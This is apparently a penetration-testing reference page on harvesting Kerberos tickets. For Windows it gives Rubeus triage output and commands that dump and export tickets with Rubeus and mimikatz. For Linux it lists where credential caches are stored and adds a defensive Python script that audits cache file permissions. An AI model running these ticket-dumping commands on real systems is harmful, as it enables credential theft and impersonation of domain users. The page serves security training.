88 - Kerberos

Harvest tickets from Windows

Rubeus triage lists the Kerberos tickets in all the logon sessions currently on a system. If you are not in an elevated state, it can only show tickets in your own logon session.

C:\Tools\Rubeus\Rubeus\bin\Debug> Rubeus.exe triage
 ------------------------------------------------------------------------------------------------------------------ 
 | LUID     | UserName                    | Service                                       | EndTime               |
 ------------------------------------------------------------------------------------------------------------------ 
 | 0x79474  | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:13:03 PM |
 | 0x3e4    | srv-1$ @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:11:00 PM |
 | 0x1f8cd  | jking @ DEV.CYBERBOTIC.IO   | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:10:56 PM |

# Using mimikatz
sekurlsa::tickets /export

# Dump all tickets with Rubeus
.\Rubeus dump

# Decode a base64-encoded ticket and write it to a .kirbi file (PowerShell)
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Harvest tickets from Linux

On Linux, tickets are stored in credential caches, or ccaches. There are three main types, which indicate where tickets can be found:

  • Files, by default under the /tmp directory, in the form of krb5cc_%{uid}.

  • Kernel Keyrings, a special space in the Linux kernel provided for storing keys.

  • Process memory, used when only one process needs to use the tickets.
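
Because file ccaches sit in a shared directory, their ownership and mode are what keep other local users from reading them. The following is an added example, not part of the original page: a hardening check that classifies a KRB5CCNAME value into the three types above and flags krb5cc_%{uid} files whose owner or mode exposes them. The function names are hypothetical, and the optional "_suffix" in the file name and the owner-only expectation are assumptions of this check.

```python
import os
import re
import stat

# Name pattern from the page: krb5cc_%{uid}; an optional "_suffix" is tolerated (assumption).
CCACHE_NAME = re.compile(r"^krb5cc_(\d+)(?:_.+)?$")

def classify_ccname(value):
    """Map a KRB5CCNAME-style value onto the three storage types listed above."""
    prefix, sep, _ = value.partition(":")
    if not sep or prefix == "FILE":
        return "file"                      # a bare path means a file cache
    if prefix == "KEYRING":
        return "kernel keyring"
    if prefix == "MEMORY":
        return "process memory"
    return "other (" + prefix + ")"        # e.g. DIR: or KCM:, not covered on this page

def audit_file_ccaches(directory="/tmp"):
    """Return (path, problem) pairs for file ccaches exposed beyond their owner."""
    findings = []
    for name in sorted(os.listdir(directory)):
        match = CCACHE_NAME.match(name)
        if not match:
            continue
        path = os.path.join(directory, name)
        info = os.lstat(path)              # lstat: do not follow symlinks
        if not stat.S_ISREG(info.st_mode):
            findings.append((path, "not a regular file"))
            continue
        if info.st_uid != int(match.group(1)):
            findings.append((path, "owner uid %d does not match name" % info.st_uid))
        if info.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
            mode = stat.S_IMODE(info.st_mode)
            findings.append((path, "mode %o grants group/other access" % mode))
    return findings

if __name__ == "__main__":
    default = "/tmp/krb5cc_%d" % os.getuid()
    print("cache type:", classify_ccname(os.environ.get("KRB5CCNAME", default)))
    for path, problem in audit_file_ccaches():
        print(path + ": " + problem)
```

Run as root to cover every user's cache files; an empty result means each matching file is a regular file, owned by the uid in its name, with no group or other permissions.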
